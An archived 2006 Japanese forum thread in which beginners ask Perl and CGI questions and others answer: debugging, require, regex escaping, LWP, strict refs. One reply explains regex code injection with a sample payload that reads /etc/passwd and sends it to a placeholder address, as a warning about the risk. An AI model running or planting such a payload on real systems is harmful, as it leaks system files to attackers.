Perlコーディング初心者質問スレ Part 52
■ このスレッドは過去ログ倉庫に格納されています
0001nobodyさん
2006/09/15(金) 14:01:51ID:gobry0n2【投稿する際の注意】
質問するときは内容をよく吟味してから投稿してください。
「コマンドの意味がわかんない」とかはマニュアル見ましょう。
回答者さんは何でも屋じゃありません。
1: 自分はこういう事がしたい。
2: それでこんな風にやってみたが・・・
3: こんなエラーが出て上手く行かなかった。
最低でも1と3が無いと誰も答えられないよ。
ソース貼る時は、全角スペースでインデント忘れずに。
良い回答は良い質問から。一緒に勉強しましょう。
お勧めサイトは >>2-10
前スレ http://pc8.2ch.net/test/read.cgi/php/1153987463/
過去ログ倉庫 ttp://user.ftth100.com/mirrorhenkan/perl/
0793nobodyさん
2006/11/12(日) 10:00:19ID:???みたいなのは順番も変えなくちゃだから、
ただリテラルを直すだけじゃ足りないかもしれない。
0794nobodyさん
2006/11/12(日) 12:11:30ID:JI5vE2Zgありがとうございます!
本当にPerlって奥が深いですね・・・もっと勉強しますm(_ _)m
0795nobodyさん
2006/11/12(日) 12:13:16ID:???ただそれだけだろ?
で、何人かが書いている通りリソースを分離できるなら
(1)分離できるところは分離する
(2)(1)の作業中に分離できないところを翻訳
(3)分離後ソースを改造開始し、(2)で分離したリソースの翻訳
これがベストか?
0796nobodyさん
2006/11/12(日) 12:22:19ID:???> ログ記録を部分を以下のようにしたところエラーが出てしまいました
Internal Server Errorだったら文法ミスとかでしょ。
鯖のエラーログ見るか文法チェックしてみ。
肝心な部分が省略されてるから答えられるのはこの程度しかない。
> この最後の1;はどうして必要なのでしょうか?
"requireしたファイルの最後"を明示しないとエラーになることがあるから。
1;がその役割。
0797nobodyさん
2006/11/12(日) 13:02:21ID:???if構文を入れなければ、「1;」を省略しても実行されるので
文法ミスではないと思いますが、if(){}を使ったことで
>ファイルの最後"を明示しないとエラーになる
が発生したものと思われます
有り難うございました
0798nobodyさん
2006/11/12(日) 13:41:44ID:???細かいとこなんだけれど一応。スルー力不足を露呈してみる。
>>796 の説明には若干の誤解があります。
require が読込むファイルは最後に真を返す必要があります。
より正確には、require されるコードが正しく実行されたかどうかの真偽を、そのコードから返す機能の名残ですが、今では誰も覚えていませんし、覚える必要もありません。
require はファイルが偽を返した場合、require されたコードの初期化に失敗したものと見なし、例外を吐いて死にます。
0800nobodyさん
2006/11/12(日) 21:22:52ID:???ありがとう、胸がすっとしたぜ!
0801nobodyさん
2006/11/13(月) 04:13:23ID:???CGI/Perl のデバッグをしたい (phpのWARNINGのような詳細なエラーを出したい) のですが、良い方法は無いでしょうか?
エラーが出たときにApacheのエラーログを見ても、「Premature end of script headers: example.cgi」 程度の記述しか表示されません。
サーバは、Fedora Core 4 + Apache 2.2.0 + Perl 5.8.6 (SuExecは使っていません。) と一般的な構成です。
ご教示お願いします。
0802nobodyさん
2006/11/13(月) 04:19:09ID:???このCGIには問題点があり、if ("検索対象文章" =~ /$hoge/i) の $hoge が "+" なので、正規表現として不正になっています。
本来ならば、500 Internet Sever Error となるべきだと思うのですが、何故かエラーにならず、スクリプトが強制終了されるだけになります。
これは何故でしょうか?
if ("検索対象文章" =~ /+/i) と書けば、当然 500 Internet Sever Error になります。
--------------- test.cgi ---------------
#!/usr/bin/perl
print "Content-Type: text/html\n\n";
print "CGI開始";
$hoge = "+";
if ("検索対象文章" =~ /$hoge/i) {
print "マッチしました。";
} else {
print "マッチしませんでした。";
}
print "CGIエンド";
exit;
----------------------------------------
ちなみに、この $hoge は実際にはCGIのユーザ入力の値です。
OSインジェクションやSQLインジェクションは聞いた事がありますが、Perl正規表現インジェクションという話は聞いた事はありませんが、
もしこの実装に、スクリプトの強制終了以外のセキュリティ上の問題点がありましたら教えていただけたら幸いです。
また、ようするに検索エンジンのように文章の検索を行いたいわけですが、ユーザ入力の正規表現のメタ文字の無効化方法がありましたら
教えて下さい。
お願いします。
0803802
2006/11/13(月) 05:00:38ID:???これに関しましては、自分で知っているメタ文字をエスケープするコードを書いてみました。
もし、エスケープ漏れがあったら教えて下さい。
$_ =~ s/\\/\\\\/g;
$_ =~ s/\^/\\\^/g;
$_ =~ s/\./\\\./g;
$_ =~ s/\$/\\\$/g;
$_ =~ s/\*/\\\*/g;
$_ =~ s/\?/\\\?/g;
$_ =~ s/\|/\\\|/g;
$_ =~ s/\(/\\\(/g;
$_ =~ s/\)/\\\)/g;
$_ =~ s/\[/\\\[/g;
$_ =~ s/\]/\\\]/g;
$_ =~ s/\{/\\\{/g;
$_ =~ s/\}/\\\}/g;
$_ =~ s/\+/\\\+/g;
0804nobodyさん
2006/11/13(月) 05:01:40ID:???use CGI::Carp qw(fatalsToBrowser);
をCGIファイルの先頭付近に。他にもKCatchとかあるから探してみそ
>>802
ヘッダを吐き出していればdieしようが何しようが表示されるのね。
/+/だと500エラーになるのは、解釈段階でエラーが発生するため。
対して/$hoge/だと$hogeの値は評価段階にならないと決定されないから
先にヘッダが出力される。よって500エラーにならない。
Perlは正規表現中に任意のコードを含めることが可能なのは事実だけれど(?{ ... })、
それなりに安全対策がしてあるので、許可しなければ外部コードが
実行されてしまうということは無いと思われる。
see also: perlre, ttp://search.cpan.org/~nwclark/perl-5.8.8/ext/re/re.pm
強制終了しないようにするためにはevalブロックを用いるといい。
そのユーザの入力というのは正規表現を期待してるのだよね?
正規表現的に意味のある文字を全てエスケープしてしまうという意味なら、
quotemeta関数なり、/\Q$hoge\E/なりがあるけれど。その場合ならindex関数を使う手もある。
0805804
2006/11/13(月) 05:12:29ID:???スマソ、思いっきり勘違いした警告か。
use warnings;
もしくはShebang行にこのように-wをつける。
#!/usr/bin/perl -w
で、さっきのと組み合わせて
use CGI::Carp qw(warningsToBrowser fatalsToBrowser);
...
warningsToBrowser(1);
のようにすると出力上にコメントとして出てくる。
0806802
2006/11/13(月) 05:46:37ID:???ご丁寧な回答ありがとうございます。
#!/usr/bin/perl -w
use CGI::Carp qw(warningsToBrowser fatalsToBrowser);
を試してみます。
また、evalブロックについてのページも参考になりました。
> Perlは正規表現中に任意のコードを含めることが可能なのは事実だけれど(?{ ... })、
これはちょっと気になるので、もしよろしければ参考URLを教えていただけたら幸いです。
> その場合ならindex関数を使う手もある。
結局それに気がついて index 関数使っちゃいました。
大文字小文字を区別することができなくなりましたが、そこは諦めます。
0807nobodyさん
2006/11/13(月) 09:26:04ID:???(?{ ... })については参考URLをさがすまでもなくperldoc perlreにちゃんと書いてあるが。
0808802
2006/11/13(月) 11:06:39ID:???ありがとうございます。
見つかりました。
http://www.kt.rim.or.jp/~kbk/perl5.005/perlre.html
正規表現中でのコードの実行機能は use re 'eval'; と宣言しない限り、使用できないようです。
ってことでユーザ入力値の値をいきなり代入したところでセキュリティ上の問題は無さそうですね。
# ただし、処理に時間のかかる正規表現をいれることにより、
# DoSに使えるかも。
0809nobodyさん
2006/11/13(月) 14:35:35ID:???0811nobodyさん
2006/11/13(月) 14:52:19ID:???いくらwarningsToBrowserやfatalsToBrowserしてもやっぱり何もでないんじゃないか。
ログみられなかったり見るのが面倒な人がつかうもんだろ?
処理系が検出するようなエラーはないがそもそもロジックがおかしい予感。
0812nobodyさん
2006/11/13(月) 14:54:42ID:???ようするに任意のコマンドが実行できる脆弱性ってことでしょ
use re 'eval';
$a =~ /$GET['search']/
こういうことしていると、「(?{open("| cat /etc/passwd > hoge@example.com"})」 を送信されたときに
/etc/passwd がクラッカーに渡ってしまう。
正規表現インジェクションとでも呼べばいいだろうか
対策は正規表現のメタ文字のエスケープだね。
0813nobodyさん
2006/11/13(月) 16:20:57ID:???コンソール版はなしですか?
0814nobodyさん
2006/11/13(月) 17:01:43ID:???以前の対話形式はppm-shell
コマンドラインなら
ppm command arg
でも行ける
# 殆どGUI版使ってないや
0816nobodyさん
2006/11/13(月) 20:06:21ID:???0818nobodyさん
2006/11/14(火) 00:35:27ID:???CGIその1内のデータを、CGIその2に受け渡すにはどうしたらいいのでしょうか?
「アドレス?パラメータ」の形で、フォームのデータをやり取りするようにデータが渡せると
書いてあったので、「アドレス?a=$a&b=$b&c=$c」というようにすれば、CGIその1で
変数aに代入したデータをCGIその2に送ることが出来るかと思ったので、
require 'cgi-lib.pl';
&ReadParse( *form );
$a = $form{'a'};
$b = $form{'b'};
$c = $form{'c'};
として、
print "${a}${b}${c}\n";
と表示してみようとしても、どの変数も空のままなのか何も表示されません。
どうすれば、変数データ等はやり取りできるようになるのでしょうか?
0819nobodyさん
2006/11/14(火) 01:02:20ID:???<input type="hdden" name="a" value="value of a">
みたいにフォームに仕込むのが簡単かな。
クライアント側でいじれちゃうというデメリットがあるけどね。
0821nobodyさん
2006/11/14(火) 04:24:01ID:???my $file = "no001.jpg";
print -s $file;
上記のようにファイルサイズを出力するスクリプトで
正規表現を用いて no???.jpg にマッチするファイルのサイズを表示させたいのですが
方法が思いつきません
分かるかたいましたらご指導お願いいたします。
0822nobodyさん
2006/11/14(火) 07:25:09ID:???0823nobodyさん
2006/11/14(火) 13:15:59ID:???LFにしたいのですが、どうやってもCRLFになってしまいます。
自宅のwindows上でも、xreaでもCRLFで出力されてしまいます。
0824nobodyさん
2006/11/14(火) 13:38:15ID:???ちゃんと出力されていました。
ブラウザでの保存時に勝手に改行コードが変えられていたようです。
0825nobodyさん
2006/11/14(火) 14:07:32ID:???loopで回して同じことして加算すれば。loopは opendir 派でなければ
foreach $hoge (<no???.jpg>) {
}
コマンドラインでなら ls -l と awk で One Liner するけどね
0826nobodyさん
2006/11/14(火) 15:06:38ID:???随時更新される Yahoo! のトップのソースぐらいぐちゃぐちゃ (文法もぐちゃぐちゃでテーブルレイアウト、勿論適切なidはついていません) なHTMLから
特定の場所のデータを抜き出して、変数に代入したいといった感じです。
<table>
<tr>
<td>AAA</td>
<td>BBB</td>
<td>CCC</td>
</tr>
<tr>
<td>DDD</td>
<td>EEE</td>
<td>FFF</td>
</tr>
</table>
例えば、上のようなテーブルのBBBの部分が随時かわるとして、それを動的に取得するかんじですね。
実際には外部のサーバのデータとなりますが、wget+cronで取得するつもりなのでそこはいいんですが、HTMLから
一部のデータを抜き出すのに便利なモジュールなどはありますでしょうか?
なかったら地味に自分でロジック組んで見ます。
0827nobodyさん
2006/11/14(火) 15:37:42ID:???$get=($html=~ m#<td>(.*?)</td>#g)[$n];
そんなもんわざわざモジュール使わなくて書いたほうがシンプルじゃん
0828nobodyさん
2006/11/14(火) 15:49:46ID:???でも正規表現でひっぱってくるしかないと思う
ソースの書き方が変わったら終わりだけど。
HTML::Parserみたいなのではないだろうし・・・
0829nobodyさん
2006/11/14(火) 22:30:15ID:???0830nobodyさん
2006/11/15(水) 11:31:14ID:???0831nobodyさん
2006/11/15(水) 22:37:01ID:???呼び元から利用可能なサブルーチンの一覧を得る方法はありますか?
0832nobodyさん
2006/11/16(木) 01:05:15ID:???これってお手本にしていいんでしょうか。
お手本的なコードを紹介してもらえないでしょうか。
0833nobodyさん
2006/11/16(木) 01:52:46ID:???&$name;
sub test {
print 'test';
}
2行目ゎうそんこ。$nameを使って&testを実行することはできますか?
0834nobodyさん
2006/11/16(木) 01:54:54ID:???main.plからFoo.pmを呼んでいるとして、
@Foo::EXPORTと@Foo::EXPORT_OKを確認したらいいんじゃないかと思う。
存在するとは限らないけど。オブジェクト指向なモジュールとかだとなにもエクスポートしないしね。
そうでなかったら直接シンボルテーブルを覗くとか。
>832
つttp://search.cpan.org/
0835nobodyさん
2006/11/16(木) 01:59:33ID:???それ自分で書いて、実行してみた?
use strict 'refs' してなければそれでいけるよ。
文字列をデリファレンスすると、自動的にシンボルテーブルからひっぱってくる。
0836nobodyさん
2006/11/16(木) 02:04:27ID:???$name = ¥&test; # use strict 'refs' OK
$name->();
$name = 'test'; # use strict 'refs' NG
$name->();
$name = 'test';
eval "$name()";
$name = 'test()';
eval $name;
0837nobodyさん
2006/11/16(木) 02:11:57ID:???833はuse strictしてる場合、エラーになりました。
'refs'はよくわからないので調べてみます。
そこだけno strictするのは素人ですか?
0839nobodyさん
2006/11/16(木) 02:19:01ID:???my $name = sub {
print "test";
};
$name->();
0840nobodyさん
2006/11/16(木) 02:20:04ID:???834さんと836さんありがとう!!
0841nobodyさん
2006/11/16(木) 02:22:36ID:???'refs' を付けると、シンボリックリファレンス(文字列をデリファレンス)だけを制限できる。
この辺は perldoc strict 参照。
ちゃんと理解してて no strict するなら問題ないと思うよ。むしろ常套手段。
0842nobodyさん
2006/11/16(木) 02:40:44ID:???外部ファイルからプラグイン的なものを自動取得する方法を考えてたんですが、
できそうな気がしてきました。サブルーチンを全部飲み込もうかと。
後から間違いだったと気づくかも知れませんが。
0843nobodyさん
2006/11/16(木) 03:59:26ID:???0844nobodyさん
2006/11/16(木) 11:46:04ID:???perl で作られた FreeStyle Wiki(ttp://fswiki.poi.jp/wiki.cgi)にもプラグインの機能が
あるけど、もしかしたら参考になるかも。
0845nobodyさん
2006/11/16(木) 14:35:02ID:???0846nobodyさん
2006/11/17(金) 01:51:27ID:???今回たくさんWIKI系を参考にしてたんですが、FreeStyleはコメントが日本語なのもあって
見やすいですね。そしてざっと見ただけでも参考なるコーディングがすでに沢山見つかってます。
0847nobodyさん
2006/11/17(金) 11:32:42ID:???(.*?) はどういう意味でしょうか?
「perl ".*?"」で5個以上の検索エンジンで検索したのに、全部記号部分が無視されましたorz
. = 任意の文字
* = 直前の文字を0回以上にマッチ
? = 直前の文字を0又は1回にマッチ
ですが、「.*?」 にする意味が分からないです。
0848847
2006/11/17(金) 11:46:48ID:???m は 改行無視、gは繰り返しマッチ、だと思うんですが /mg をかっこよく左右に分離させて
バランス良く美しく書いている感じでしょうか?
何かいい解説サイトがありましたら教えていただけたら幸いです。
0849nobodyさん
2006/11/17(金) 11:52:51ID:???ネットでも「Perl 正規表現」で複合検索かければイパーイあるでし
0850nobodyさん
2006/11/17(金) 12:45:57ID:???$get=($html=~ m#<td>(.*?)</td>#g)[$n];
$get=($html=~ /<td>(.*?)<\/td>/g)[$n];
同じ。
セパレータが違うのと、m演算子はセパレータが/の時だけ省略できる
(.*?)は任意の文字列
検索しても、読まないと意味が無いぞ!!
0851nobodyさん
2006/11/17(金) 13:00:08ID:???0852nobodyさん
2006/11/17(金) 13:08:37ID:???0853852
2006/11/17(金) 13:09:29ID:???そまそ。
0854nobodyさん
2006/11/17(金) 19:14:27ID:???([^<]+)<とかやってたよ
0855nobodyさん
2006/11/17(金) 20:02:23ID:3ps2NDUf0856nobodyさん
2006/11/17(金) 20:46:15ID:???$hoge = 'ぺにす';
{
local $hoge; # ちょっとどいてね
$hoge = 'わぎな';
}
print $hoge;
myのつかいかた
{
my $hoge = 'ちんぽ'; # ぶろっくの中だけ使えるね
}
print $hoge;
0857nobodyさん
2006/11/18(土) 00:00:27ID:???0858nobodyさん
2006/11/18(土) 01:14:14ID:gJVNJgdHややスレ違いかもしれませんが質問させてもらいます。
Perl+MySQLでプログラムを書いていまして、IDとしてオートインクリメントされる
フィールドを設けているのですが、INSERTでレコードを挿入したあとに、
オートインクリメントされた値を知りたい(変数に格納したい)のですが、何か簡単
な方法はありますか?
0859858
2006/11/18(土) 02:19:05ID:gJVNJgdH0861nobodyさん
2006/11/18(土) 18:58:43ID:???404だけでなく、ファイルが無ければ特定URLに転送される場合にも対応したいと思っています。
LWP::Simpleを使ってgetとheadで実験してみたところ、
共にリンク先が無い場合、転送先のページに飛んでそれを取得してきました。
head関数では($content_type, $document_length, $modified_time, $expires, $server)の配列が
返されるとのことですが、
$document_length→body部分の文字数
$modified_time→取得にかかった時間
という理解でよいのでしょうか?(質問1)
現在$document_lengthでリンク先の状態を判別しようと思っていますが、さらに精度のよい判別が
できる関数がありましたらご教授願いたいです。(質問2)
0862nobodyさん
2006/11/18(土) 19:34:29ID:???modified_time 最終更新時間
$response -> status_line;
0863861
2006/11/19(日) 02:39:50ID:???こんな感じのソースです。
#!/usr/local/bin/perl
# モジュールを保存した場所を指定
use lib qw(../../../perl/lib/perl5/site_perl/5.8.4);
# モジュールを使う
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$req = HTTP::Request->new('GET', 'http://yahoo.co.jp/');
$res = $ua->request($req);
$res->content;
print "Content-type: text/html\n\n";
print "<html><head><title></title></head><body>";
print "$res";
print "</body></html>";
すると、画面に「HTTP::Response=HASH(0x8309728)」とだけ表示されました。
16進数で何かしらのデータが受信して表示されていると思うのですが、$resが何なのか分かるように
表示するにはどうしたらいいのでしょうか?
0864nobodyさん
2006/11/19(日) 02:44:49ID:???だからrequestでgetしたデータは「$res->content」で返される。
つまりこうすれば良い↓
print "Content-type: text/html\n\n";
print "<html><head><title></title></head><body>";
print $res->content;
print "</body></html>";
0865861
2006/11/19(日) 03:35:42ID:???ご丁寧にありがとうございます。
$ua = LWP::UserAgent->new;
$req = HTTP::Request->new('GET', 'http://yahoo.co.jp/');
$res = $ua->request($req);
この場合だと、ここのスレッドが完了した時点で$res(物理的にはメモリ)に
「http://yahoo.co.jp/」からのソースが保持されていて、
$res->contentその中からbody部分のデータを持った変数。
という理解でいいでしょうか?
0866nobodyさん
2006/11/19(日) 04:01:31ID:???>$res->contentその中からbody部分のデータを持った変数。
これは「$resの"content"に入ってるデータを引っ張り出す」と考えたほうが良い。
あとbody部分だけじゃなくて、head含めて全部だから。
0867nobodyさん
2006/11/19(日) 11:27:48ID:???0868nobodyさん
2006/11/19(日) 15:38:26ID:???package Hoge;
use IO::File;
sub load {
my $fh = IO::File->new('test.txt','r');
my @tmp = $fh->getlines();
$fh->close();
}
1;
#!/usr/bin/perl
use IO::File;
my $fh = IO::File->new('test.txt','r');
my @tmp = $fh->getlines();
$fh->close();
パッケージだと $fh->getlines(); でエラーになります。
パッケージにする時って何か特殊な事をしないと駄目ですか?
0869nobodyさん
2006/11/19(日) 17:06:20ID:???どんなエラーですか?
Hogeパッケージの方はload()というサブルーチンのようですが、呼び出している部分がないので
どう使っているかわかりません。
Can't call method "getlines" on an undefined value
というエラーなら、newに失敗しているということでしょう。$fhをチェックすべきです。
0870nobodyさん
2006/11/19(日) 17:19:22ID:Hl3UB+5JFOREACHによるループ部分とそれ以外の差し替え部分を
同時にprocessするにはどうしたらいいんでしょうか?
0871868
2006/11/19(日) 17:53:17ID:???>Can't call method "getlines" on an undefined value
このエラーです。
呼び出しは
#!/usr/bin/perl
use Hoge;
Hoge->load();
です。
0872nobodyさん
2006/11/19(日) 21:19:45ID:???私のところで動作させてみたら、エラーは出ずに動きましたよ。
IO::File->new の返り値を確かめましたか?
Hoge.pm
--------
package Hoge;
use IO::File;
sub load {
my $fh = IO::File->new('test.txt','r') or die $!;
my @tmp = $fh->getlines();
$fh->close();
return @tmp;
}
1;
--------
hoge.pl
--------
use Hoge;
print Hoge->load();
--------
0874nobodyさん
2006/11/20(月) 15:06:26ID:???local $method = @_;
のように宣言する行で
Global symbol "$method" requires explicit package name at test.cgi line 74.
とエラーが出てしまいます
これはどういった原因が考えられるのでしょうか
分かるかたいましたらお願いいたします。
0875nobodyさん
2006/11/20(月) 15:24:14ID:???0877nobodyさん
2006/11/20(月) 15:50:27ID:???エラーメッセージ読めばだいたいわかると思うが、さらに詳しくしりたければ
perldiag(1)を読め。
Global symbol "%s" requires explicit package name
(F) You've said "use strict vars", which indicates that all vari-
ables must either be lexically scoped (using "my"), declared
beforehand using "our", or explicitly qualified to say which pack-
age the global variable is in (using "::").
'use strict vars'が指定されているので、すべての変数は("my"を用いた)
レキシカルスコープの変数か、事前に"our"で宣言されるか、("::"を用いて)
明示的に修飾することでどのパッケージに所属するかを示したグローバル
変数でなければなりません。
0879nobodyさん
2006/11/20(月) 20:27:04ID:???サブルーチン 呼び出してるときに、値が入っていないのでは?
shiftしれば、その結果でわかるかと思う
0880nobodyさん
2006/11/20(月) 20:51:34ID:???use strict 下で宣言されてない変数を使おうとした時のエラーだって >>877 で書いてあるじゃない。
local は既に宣言されてる変数の値の変化を局所化するだけで、変数の宣言にはならないんだってば。
my か our で宣言しないとダメ。あやふやな回答は質問者を混乱させるだけだよ(´・ω・)
0881TORA
2006/11/20(月) 22:44:57ID:a7JS476Dはじめまして
最近Perlを勉強しはじめたものなんですが
「数列を配列に入れ、偶数だけ表示させてください」
配列とかわかるのですが偶数だけ表示とかっていうのがわかりません。
周りの人に聞いても知らない人が多いので助けてください><
0884nobodyさん
2006/11/20(月) 23:04:46ID:???0885nobodyさん
2006/11/20(月) 23:12:06ID:???use strict;
use Math::BigInt;
use Tie::LazyList;
tie my @seq, 'Tie::LazyList', [ 1 ], sub { my($array_ref, $n) = @_; $n };
for my $n (1..20) {
my $x = Math::BigInt->new($seq[$n]);
print "$x\n" if $x->is_even;
}
0886nobodyさん
2006/11/20(月) 23:15:17ID:???0887nobodyさん
2006/11/20(月) 23:17:56ID:???ただ、4 % 2 = 0 じゃなくて 4 % 2 == 0
0891nobodyさん
2006/11/20(月) 23:32:48ID:???my @Array = ( 1.. 1000 );
my %number;
@number{@Array} = (1) x @Array;
printf qq|%d\n|, $_ for grep not( $_ % 2), keys %number;
# 乱数っぽく♪
■ このスレッドは過去ログ倉庫に格納されています